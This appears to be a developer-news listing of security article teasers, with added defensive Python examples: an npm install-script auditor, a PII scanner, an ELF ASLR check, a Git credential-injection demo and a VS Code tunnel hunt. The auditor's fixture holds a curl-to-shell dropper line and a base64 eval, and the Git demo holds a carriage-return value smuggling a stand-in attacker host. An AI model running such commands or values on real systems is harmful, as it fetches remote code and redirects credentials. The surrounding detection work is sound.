AI coding tools: Productivity gains, security pains

Photo of a boltcutter illustrating how AI coding tools are increasing productivity but also cyber security risks in software development.

Apiiro has published research on how generative AI coding tools are accelerating development while simultaneously increasing security risk.

The research found that generative AI tools have supercharged coding velocity while putting sensitive data such as Personally Identifiable Information (PII) and payment details at significant risk.
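As an added illustration (the editor's example, not Apiiro's tooling), the following Python scan looks for hard-coded payment card numbers and e-mail addresses in source text, the kind of sensitive data that can end up in AI-generated fixtures. A Luhn check keeps random digit runs such as order IDs from being reported as cards. The regexes, the masking format and the sample input are constructed for this example.

```python
# Added example (not Apiiro's tooling): a small pre-commit style scan for
# hard-coded payment card numbers and e-mail addresses in source text.
# Luhn validation keeps random digit runs (order IDs, timestamps) from
# being reported as cards. Patterns and the sample input are constructed.
import re
from dataclasses import dataclass

# Candidate primary account number: 13-19 digits, optional space/hyphen separators.
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum over a digit string; every real card number passes it."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(digits: str) -> str:
    """Keep BIN and last four so a finding is actionable without re-leaking it."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


@dataclass
class Finding:
    line: int
    kind: str
    value: str          # masked card number or the e-mail address


def scan(text: str) -> list:
    """Return one Finding per Luhn-valid card number or e-mail address."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in CARD_RE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group())
            if luhn_ok(digits):
                findings.append(Finding(lineno, "card", mask(digits)))
        for m in EMAIL_RE.finditer(line):
            findings.append(Finding(lineno, "email", m.group()))
    return findings


# Constructed sample standing in for AI-generated test fixtures.
SAMPLE = """\
# fixtures for the checkout tests
TEST_CARD = "4111 1111 1111 1111"
ORDER_ID = "1234567890123456"
SUPPORT = "jane.doe@example.com"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"line {f.line}: {f.kind} {f.value}")
```

Run as a script it reports the card on line 2 and the e-mail on line 4 but ignores the 16-digit order ID, which fails the Luhn check; findings carry a masked value so the scanner's own output does not become another copy of the secret.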

As organisations increasingly adopt AI-driven development workflows, the need for robust application security and governance is becoming...

Matan Giladi, Apiiro: Guarding your code against malicious patterns

Knight guarding code on a computer illustrating open-source resources released by Apiiro to help protect software developers and their projects against hacking through vulnerabilities in supply chains.

Malicious code is proving as persistent a threat as ever, despite years of awareness campaigns and ongoing incidents that demonstrate the vulnerabilities in software supply chains.

This year, Apiiro’s security research teams detected and analysed thousands of malicious code instances found in repositories and packages. What’s alarming is the ease with which these attacks exploit fundamental gaps in workflows, from dependency managers to build systems.

Highlighting...

Lazarus Group infiltrates supply chain with stealthy malware

Man in the shadows illustrating analysis from SecurityScorecard that finds a stealthy new malware campaign by North Korea state-sponsored hacking group Lazarus Group that targets developers through the software supply chain and can infect NPM packages and more, particularly targeting the cryptocurrency and web3 sectors.

SecurityScorecard has uncovered a stealthy malware campaign orchestrated by North Korea's notorious Lazarus Group. The operation, dubbed "Marstech Mayhem," reveals the deployment of an advanced malware implant specifically designed to target cryptocurrency wallets and infiltrate the software supply chain.

The campaign, which began emerging in late 2024, centres around a newly identified implant called "marstech1." This sophisticated tool marks a significant evolution in the...
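Both the Apiiro summary above (gaps in dependency managers and build systems) and the Lazarus campaign (malicious packages aimed at developers) come down to code that runs automatically when a package is installed. As an added example that is neither Apiiro's nor SecurityScorecard's tooling, the Python below audits an npm package.json for install-time lifecycle scripts that behave like droppers. The indicator regexes are an illustrative subset chosen by the editor, not a published rule set, and both manifests are constructed.

```python
# Added example (not Apiiro's or SecurityScorecard's tooling): audit an npm
# package.json for install-time lifecycle scripts that look like droppers.
# Lifecycle hooks run automatically on `npm install`, which is one of the
# dependency-manager gaps malicious packages abuse. The indicator regexes are
# an illustrative subset chosen by the editor, not a published rule set.
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

INDICATORS = {
    # download piped straight into an interpreter
    "remote_fetch": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|node)\b"),
    # inline evaluation of code, including node -e one-liners
    "inline_eval": re.compile(r"\b(eval|Function)\s*\(|\bnode\s+-e\b"),
    # payload hidden behind base64 decoding
    "encoded_payload": re.compile(
        r"base64\s+(-d|--decode)\b|Buffer\.from\([^,]+,\s*['\"]base64['\"]\)"),
    # staging in temp or hidden home directories
    "staging_path": re.compile(r"(/tmp/|%TEMP%|~/\.)"),
}


def audit_manifest(manifest_json: str) -> dict:
    """Return {hook: [indicator names]} for each lifecycle hook that trips an
    indicator; an empty dict means nothing was flagged."""
    pkg = json.loads(manifest_json)
    scripts = pkg.get("scripts") or {}
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if hits:
            findings[hook] = hits
    return findings


# Constructed manifests: a native module with a legitimate rebuild step, and a
# package whose hooks fetch and evaluate remote, base64-wrapped code.
BENIGN = json.dumps({"name": "example-native", "version": "1.0.0",
                     "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}})
DROPPER = json.dumps({"name": "example-helper", "version": "1.0.3",
                      "scripts": {
                          "preinstall": "curl -s https://example.invalid/p | sh",
                          "postinstall": "node -e \"eval(Buffer.from('aGk=','base64').toString())\""}})

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN), ("dropper", DROPPER)):
        print(label, audit_manifest(manifest) or "clean")
```

The benign manifest passes because a native rebuild in postinstall is normal; the dropper is flagged on two hooks. A scan like this complements, rather than replaces, installing with `npm install --ignore-scripts` in CI so that no lifecycle hook runs before a human or a policy has looked at it.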

MIT researchers develop ‘Oreo’ to protect against hardware attacks

Photo of an Oreo as MIT CSAIL researchers develop a solution named after the famous cookie to enhance the ASLR security measure found in modern operating systems, including Linux and Windows, to protect computers against hardware attacks.

Researchers at the MIT Computer Science and Artificial Intelligence Laboratory (CSAIL) have developed a new method to protect computers against hardware attacks.

Within a program's address space, its instructions sit at particular virtual addresses. Address Space Layout Randomisation (ASLR) shuffles that layout on every run precisely so that attackers cannot predict those addresses, but attackers have found ways to exploit hardware flaws, such as side channels in the processor itself, to recover the randomised layout.
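Before ASLR can be defeated it has to be in play, and that is the practical check a practitioner wants first. The Python below is an added example, not part of the MIT CSAIL work: it reads the ELF header to decide whether a Linux binary is position-independent (only an ET_DYN image can have its code placed at a randomised base; an ET_EXEC image always loads at its fixed link address) and reports the kernel-wide randomisation level. The constructed header helper exists only so the check can be exercised without a real binary.

```python
# Added example, not part of the MIT CSAIL work: two host-side checks that
# tell you whether ASLR is even in play for a given Linux binary. Oreo targets
# attacks that defeat ASLR; if the binary is not position-independent, its
# instruction addresses are fixed and there is nothing to defeat.
import struct
import sys
from pathlib import Path
from typing import Optional

ET_EXEC, ET_DYN = 2, 3   # ELF e_type values


def is_pie(elf_bytes: bytes) -> bool:
    """True when the ELF is ET_DYN (position-independent), so the loader can
    place its code at a randomised base; ET_EXEC images load at their fixed
    link address and ASLR cannot move their instructions. Note that shared
    libraries are ET_DYN too, so apply this to executables."""
    if len(elf_bytes) < 24 or elf_bytes[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    endian = "<" if elf_bytes[5] == 1 else ">"   # EI_DATA: 1 = little-endian
    (e_type,) = struct.unpack_from(endian + "H", elf_bytes, 16)
    return e_type == ET_DYN


def aslr_level(proc_path: str = "/proc/sys/kernel/randomize_va_space") -> Optional[int]:
    """Kernel-wide setting: 0 = off, 1 = stack/mmap/vdso randomised,
    2 = also the heap (brk). None when the file is absent (non-Linux)."""
    try:
        return int(Path(proc_path).read_text().strip())
    except (OSError, ValueError):
        return None


def make_header(e_type: int, endian: str = "<") -> bytes:
    """Constructed minimal 64-byte ELF64 header, for self-testing only."""
    e_ident = b"\x7fELF" + bytes([2, 1 if endian == "<" else 2, 1]) + b"\x00" * 9
    rest = struct.pack(endian + "HHI", e_type, 0x3E, 1)   # e_type, EM_X86_64, EV_CURRENT
    return e_ident + rest + b"\x00" * 40


if __name__ == "__main__":
    level = aslr_level()
    print("kernel randomize_va_space:", "unavailable" if level is None else level)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            head = fh.read(64)
        print(sys.argv[1], "is PIE" if is_pie(head) else "is NOT PIE (fixed load address)")
```

Run with a path to a binary it prints whether that binary can benefit from ASLR at all; a non-PIE executable on a system with randomize_va_space set to 2 still has every instruction at a known address, no side channel required.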

Dubbed ‘Oreo’ after...

Security engineer uncovers multiple Git vulnerabilities

Groot and GitHub mascot Octocat reading a newspaper as a security engineer uncovers multiple critical Git vulnerabilities that exposed millions of software developers to credential theft.

A security engineer has disclosed a series of critical vulnerabilities in Git-related tools that exposed millions of developers to credential theft.

RyotaK, a security engineer at GMO Flatt Security Inc., was bug hunting for the GitHub Bug Bounty program in October 2024 when they discovered weaknesses in GitHub Desktop, Git Credential Manager, Git LFS, GitHub CLI, and GitHub Codespaces—all stemming from improper input validation and handling of text-based protocols.
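The "text-based protocols" in question are the newline-delimited key=value exchanges Git uses to talk to credential helpers. The Python below is an added example, not code from the disclosure or from any of the projects named above: it shows a helper-side parser, a producer that screens only for a bare newline, and a hardened producer that rejects every control character. The URLs are constructed and the attack value illustrates the injection class in general, not any specific reported bug.

```python
# Added example, not code from the disclosure or from any of the projects
# named above: the newline-delimited key=value exchange Git uses to talk to
# credential helpers, with a producer that screens only for LF beside one
# that rejects every control character. URLs are constructed; the attack
# value only illustrates the injection class, not a specific reported bug.
from urllib.parse import urlsplit, unquote


class CredentialProtocolError(ValueError):
    pass


def parse_request(blob: str) -> dict:
    """Helper-side parser: key=value lines up to a blank line. splitlines()
    is the subtle weakness here: it also breaks on a carriage return (and a
    few other characters), so a producer that only screens for a newline
    does not protect this consumer."""
    fields = {}
    for line in blob.splitlines():
        if line == "":
            break
        key, sep, value = line.partition("=")
        if not sep:
            raise CredentialProtocolError(f"malformed line: {line!r}")
        fields[key] = value          # a repeated key silently overrides
    return fields


def _url_fields(url: str) -> list:
    u = urlsplit(url)
    # percent-decoding the path is the step that turns %0d into a raw CR
    return [("protocol", u.scheme), ("host", u.netloc),
            ("path", unquote(u.path.lstrip("/")))]


def naive_request(url: str) -> str:
    """Producer that rejects a bare newline but nothing else."""
    out = []
    for key, value in _url_fields(url):
        if "\n" in value:
            raise CredentialProtocolError(f"newline in {key}")
        out.append(f"{key}={value}")
    return "\n".join(out) + "\n\n"


def safe_request(url: str) -> str:
    """Hardened producer: no CR, LF or NUL may reach the wire in any field."""
    out = []
    for key, value in _url_fields(url):
        if any(ch in value for ch in "\r\n\0"):
            raise CredentialProtocolError(f"control character in {key}")
        out.append(f"{key}={value}")
    return "\n".join(out) + "\n\n"


# Constructed URLs: a normal clone target and one whose path smuggles a
# second host= line behind an encoded carriage return.
BENIGN_URL = "https://git.example.com/org/repo.git"
ATTACK_URL = "https://git.example.com/%0dhost=evil.example"

if __name__ == "__main__":
    print("naive:", parse_request(naive_request(ATTACK_URL))["host"])   # evil.example
    try:
        safe_request(ATTACK_URL)
    except CredentialProtocolError as exc:
        print("safe:", exc)
```

With the naive producer the helper ends up resolving credentials for evil.example, because the decoded carriage return splits the path line and the second host= wins; the hardened producer refuses the request outright. Git only includes the path= field when credential.useHttpPath is enabled, but the same reasoning applies to every field that crosses a line-oriented boundary: validate on the way out and on the way in, and never let the two sides disagree about what ends a line.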

Git Credential...

Snyk: AI-powered vulnerability remediations and protecting shadow IT

Security in development won’t become “invisible” this year, but it will become easier to manage.

Those are the thoughts of Danny Allan, CTO at developer-orientated cybersecurity firm Snyk.

Right now, developers are primarily tasked with creativity (building things); with the shift left, however, security has become part of their remit. Allan believes we're about to see security largely handed over to the security operations team, guided much more by AI in every...

Software development trends and predictions for 2025

Developer using a computer with a crystal ball on the monitor illustrating predictions and trends for the software development industry in 2025.

As the world races towards 2025, Developer examines what lies ahead for software development in the new year.

Among the most pressing trends for 2025 are AI development simplification, the integration of cross-functional engineering teams, and the evolution of DevSecOps practices. These shifts promise to redefine how companies approach innovation, security, and efficiency in their development pipelines.

AI-powered development simplification

Avthar Sewrathan, AI...

Operation Digital Eye: Chinese hackers exploit Visual Studio Code

A digital eye illustrating cybersecurity researchers unveiling the "Operation Digital Eye" cyberespionage operation linked to a suspected Chinese Advanced Persistent Threat (APT) group that exploits the Remote Tunnels feature of Visual Studio Code (VS Code).

A sophisticated cyberespionage operation dubbed "Operation Digital Eye" has been attributed to a suspected Chinese Advanced Persistent Threat (APT) group. 

According to Aleksandar Milenkoski, Senior Threat Researcher at SentinelLabs, and Luigi Martire, Senior Malware Analyst at Tinexta Cyber, the campaign targeted large business-to-business (B2B) IT service providers in southern Europe between late June and mid-July 2024.
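Abuse of a legitimate remote-access feature leaves few malware artefacts, so the useful signal is how the tunnel was started and where it connects. The Python below is an added example, not from the SentinelLabs/Tinexta Cyber report: a minimal hunt over process-creation and network events for VS Code tunnel activity. The event shape is a constructed JSON-lines format, and the binary names, tunnel service domain suffixes and "interactive parent" list are the editor's assumptions to be checked against Microsoft's documentation and your own telemetry before use.

```python
# Added example (not from the SentinelLabs/Tinexta Cyber report): a minimal
# hunt over process-creation and network events for abuse of the VS Code
# tunnel feature. The event shape is a constructed JSON-lines format; the
# binary names, tunnel service domains and "interactive parent" list are the
# editor's assumptions and should be checked against Microsoft's
# documentation and your own telemetry before use.
import json

TUNNEL_BINARIES = {"code", "code.exe", "code-tunnel.exe"}
TUNNEL_DOMAIN_SUFFIXES = (".tunnels.api.visualstudio.com", ".devtunnels.ms")
INTERACTIVE_PARENTS = {"explorer.exe", "powershell.exe", "windowsterminal.exe",
                       "bash", "zsh", "gnome-terminal"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyse(event: dict) -> list:
    """Return the reasons this event is suspicious; an empty list means none.
    A developer running `code tunnel` from a shell yields a single low-value
    reason; an unattended launch from a service-like parent stacks several."""
    reasons = []
    image = basename(event.get("image", ""))
    tokens = event.get("cmdline", "").split()
    if image in TUNNEL_BINARIES and "tunnel" in tokens:
        reasons.append("vscode_tunnel_invocation")
        if "--accept-server-license-terms" in tokens:
            reasons.append("unattended_license_accept")   # nobody at a prompt
        parent = basename(event.get("parent_image", ""))
        if parent and parent not in INTERACTIVE_PARENTS:
            reasons.append(f"non_interactive_parent:{parent}")
    dest = event.get("dest_host", "").lower()
    if dest.endswith(TUNNEL_DOMAIN_SUFFIXES):
        reasons.append("tunnel_service_connection")
    return reasons


def hunt(jsonl: str) -> list:
    """Run analyse() over JSON-lines telemetry; return [(event id, reasons)]."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = analyse(event)
        if reasons:
            hits.append((event["id"], reasons))
    return hits


# Constructed telemetry: a normal editor launch, a tunnel started headless by
# the task scheduler, its outbound connection, and a developer's own tunnel.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"id": "e1", "image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": r"Code.exe C:\src\app", "parent_image": r"C:\Windows\explorer.exe"},
    {"id": "e2", "image": r"C:\ProgramData\code.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms --name srv01",
     "parent_image": r"C:\Windows\System32\svchost.exe"},
    {"id": "e3", "image": r"C:\ProgramData\code.exe", "cmdline": "",
     "dest_host": "global.rel.tunnels.api.visualstudio.com"},
    {"id": "e4", "image": "/usr/bin/code", "cmdline": "code tunnel",
     "parent_image": "/bin/zsh"},
])

if __name__ == "__main__":
    for event_id, reasons in hunt(SAMPLE_EVENTS):
        print(event_id, ", ".join(reasons))
```

The ordinary editor launch (e1) is silent, the developer's own interactive tunnel (e4) produces one reason that an analyst can triage quickly, and the headless tunnel launched by a service-like parent (e2) stacks three, which is the combination worth an alert. Pair the process rule with an egress policy: if a host has no business reaching the tunnel service domains, block them and let the attempt itself be the detection.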

Visual Studio Code hijacked

In what...

Linux Foundation releases ‘Census III’ open source report

Photo of a computer and smartphone illustrating the release of the Census III open-source report into the Free and Open Source Software (FOSS) ecosystem by the Linux Foundation, highlighting areas such as security and the rise of specific packages.

The Linux Foundation has released a report that identifies the most commonly used free and open source software (FOSS) application libraries.

Developed in partnership with the Laboratory for Innovation Science at Harvard, the “Census III” report provides invaluable insights into the state of the OSS ecosystem. Leveraging over 12 million data points from production environments across more than 10,000 companies, Census III highlights critical trends and challenges surrounding...

Cloudsmith tackles artifact complexity with observability suite

Magnifying glass over a laptop keyboard illustrating the launch of an observability suite by Cloudsmith to improve artifact management and tackle compliance and cyber security challenges with deep insights.

Cloudsmith is launching an observability suite that promises to improve artifact management by offering detailed insights into usage, security, and compliance.

In today's software development environment, dependencies are vast and intersecting—spanning open-source libraries, third-party packages, and proprietary code. With open-source components comprising over 90% of modern applications and codebases typically featuring around 500 direct and indirect dependencies, managing such...